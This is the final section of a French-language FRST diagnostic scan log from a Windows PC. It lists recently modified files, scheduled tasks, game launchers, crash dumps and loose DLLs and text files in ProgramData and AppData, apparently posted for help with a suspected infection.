2023-03-31 16:18 - 2019-12-07 11:03 - 000000000 ____D C:\Windows\CbsTemp 2023-03-31 16:11 - 2021-08-20 14:30 - 000005810 _____ C:\Windows\system32\PerfStringBackup.INI 2023-03-31 16:11 - 2019-12-07 16:49 - 004741736 _____ C:\Windows\system32\perfh00C.dat 2023-03-31 16:11 - 2019-12-07 16:49 - 001341366 _____ C:\Windows\system32\perfc00C.dat 2023-03-31 16:04 - 2021-08-20 15:41 - 000000000 ____D C:\Windows\Minidump 2023-03-31 16:04 - 2021-08-20 14:22 - 000000000 ____D C:\Windows\system32\SleepStudy 2023-03-31 13:49 - 2023-02-03 18:42 - 000001464 _____ C:\Users\Hdupo\Desktop\NVIDIA GeForce NOW.lnk 2023-03-31 13:49 - 2023-01-08 19:05 - 000001472 _____ C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NVIDIA GeForce NOW.lnk 2023-03-31 13:49 - 2022-11-26 16:55 - 000000000 ____D C:\Users\Hdupo\AppData\Local\NVIDIA Corporation 2023-03-31 13:44 - 2021-09-03 10:10 - 000002205 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2023-03-31 13:44 - 2021-09-03 10:10 - 000002164 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2023-03-31 13:42 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\AppReadiness 2023-03-29 17:33 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps 2023-03-29 17:30 - 2021-08-20 15:35 - 000017424 _____ (MICSYS Technology Co., LTd) C:\Windows\system32\Drivers\MsIo64.sys 2023-03-29 17:29 - 2022-02-13 00:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2023-03-29 17:29 - 2021-12-12 17:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit 2023-03-29 17:29 - 2021-12-12 17:49 - 000000000 ____D C:\Program Files\Java 2023-03-29 17:29 - 2021-08-20 15:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIGABYTE 2023-03-29 17:29 - 2021-08-20 15:04 - 000000000 ____D C:\Users\Hdupo\AppData\Local\Downloaded Installations 2023-03-29 17:29 - 2021-08-20 15:04 - 000000000 ____D C:\Program Files (x86)\GIGABYTE 2023-03-29 16:34 - 2023-02-27 09:06 - 001873396 ____N C:\Windows\Minidump\032923-14546-01.dmp 2023-03-29 16:34 - 2021-08-20 15:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2023-03-29 16:31 - 2021-08-20 14:22 - 000000000 ____D C:\Windows\system32\Drivers\wd 2023-03-29 16:26 - 2022-04-25 11:43 - 000000000 ____D C:\Users\Hdupo\AppData\Local\CrashDumps 2023-03-29 16:25 - 2023-01-17 12:48 - 000002280 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2023-03-29 16:25 - 2021-08-20 14:22 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2023-03-26 13:50 - 2022-06-10 22:07 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\.tlauncher 2023-03-24 17:19 - 2021-12-12 19:42 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-274230415-3152524040-1578995417-1001 2023-03-24 17:19 - 2021-08-20 14:31 - 000003382 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-274230415-3152524040-1578995417-1001 2023-03-24 17:19 - 2021-08-20 14:26 - 000002417 _____ C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2023-03-23 18:49 - 2022-10-11 15:30 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat.lnk 2023-03-23 18:49 - 2022-10-11 15:30 - 000002021 _____ C:\Users\Public\Desktop\Adobe Acrobat.lnk 2023-03-23 18:49 - 2021-08-20 19:42 - 000004562 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task 2023-03-22 17:31 - 2021-10-16 17:52 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla 2023-03-22 17:31 - 2021-08-20 15:00 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2023-03-21 18:40 - 2023-01-31 12:46 - 000000760 _____ C:\Windows\Tasks\CCleanerCrashReporting.job 2023-03-20 18:40 - 2023-02-03 22:18 - 000003474 _____ C:\Windows\system32\Tasks\CCleanerCrashReporting 2023-03-20 18:40 - 2021-09-03 17:39 - 000003936 _____ C:\Windows\system32\Tasks\CCleaner Update 2023-03-19 23:02 - 2022-12-08 15:53 - 000001244 _____ C:\Users\Hdupo\Desktop\Roblox Studio.lnk 2023-03-19 23:02 - 2021-10-17 20:27 - 000001421 _____ C:\Users\Hdupo\Desktop\Roblox Player.lnk 2023-03-19 23:02 - 2021-10-17 20:25 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox 2023-03-19 16:51 - 2022-06-10 22:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TLauncher 2023-03-19 16:45 - 2022-06-10 22:07 - 000001949 _____ C:\Users\Hdupo\Desktop\TLauncher.lnk 2023-03-19 16:40 - 2019-12-07 11:13 - 000000000 ____D C:\Windows\INF 2023-03-19 16:24 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\winevt 2023-03-19 16:14 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\oobe 2023-03-19 11:28 - 2022-12-24 14:47 - 000000000 ____D C:\Users\Hdupo\Desktop\photo stage 2023-03-19 11:16 - 2021-11-21 21:55 - 000000000 ____D C:\found.000 2023-03-18 21:11 - 2022-10-20 19:15 - 000079352 _____ (Microsoft Corporation) C:\Windows\system32\xgamehelper.exe 2023-03-18 21:11 - 2022-10-20 19:15 - 000062928 _____ (Microsoft Corporation) C:\Windows\system32\xgamecontrol.exe 2023-03-18 21:11 - 2022-03-25 17:45 - 002786768 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000476624 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000243200 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000202192 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000165328 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 2023-03-18 21:06 - 2021-08-20 14:22 - 000003690 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2023-03-18 21:06 - 2021-08-20 14:22 - 000003566 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2023-03-18 17:01 - 2022-11-26 14:50 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job 2023-03-15 14:12 - 2021-08-20 14:37 - 000000000 ____D C:\Windows\system32\MRT 2023-03-15 14:10 - 2021-08-20 14:37 - 153620824 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2023-03-07 23:00 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2023-03-04 19:37 - 2021-10-29 17:10 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\TS3Client 2023-03-02 20:10 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\LiveKernelReports 2023-03-01 22:20 - 2021-10-17 20:25 - 000000252 _____ C:\Users\Hdupo\AppData\LocalLow\rbxcsettings.rbx ==================== Fichiers à la racine de certains dossiers ======== 2022-02-08 19:56 - 2022-02-08 19:56 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll 2022-02-08 19:56 - 2022-02-08 19:56 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll 2022-02-08 19:56 - 2022-02-08 19:56 - 000214016 _____ () C:\ProgramData\msvcp140.dll 2022-02-08 19:59 - 2022-02-08 20:00 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll 2022-02-08 20:00 - 2022-02-08 20:00 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll 2022-02-08 20:00 - 2022-02-08 20:00 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll 2023-03-19 20:21 - 2023-03-24 14:54 - 000000015 _____ () C:\Users\Hdupo\AppData\Roaming\obs-virtualcam.txt 2022-02-08 20:00 - 2022-02-08 20:00 - 000000564 _____ () C:\Users\Hdupo\AppData\Local\bowsakkdestx.txt 2022-01-20 13:42 - 2022-01-20 13:42 - 000016438 _____ () C:\Users\Hdupo\AppData\Local\partner.bmp 2022-04-12 18:56 - 2022-11-26 12:41 - 000007601 _____ () C:\Users\Hdupo\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) ==================== Fin de FRST.txt ========================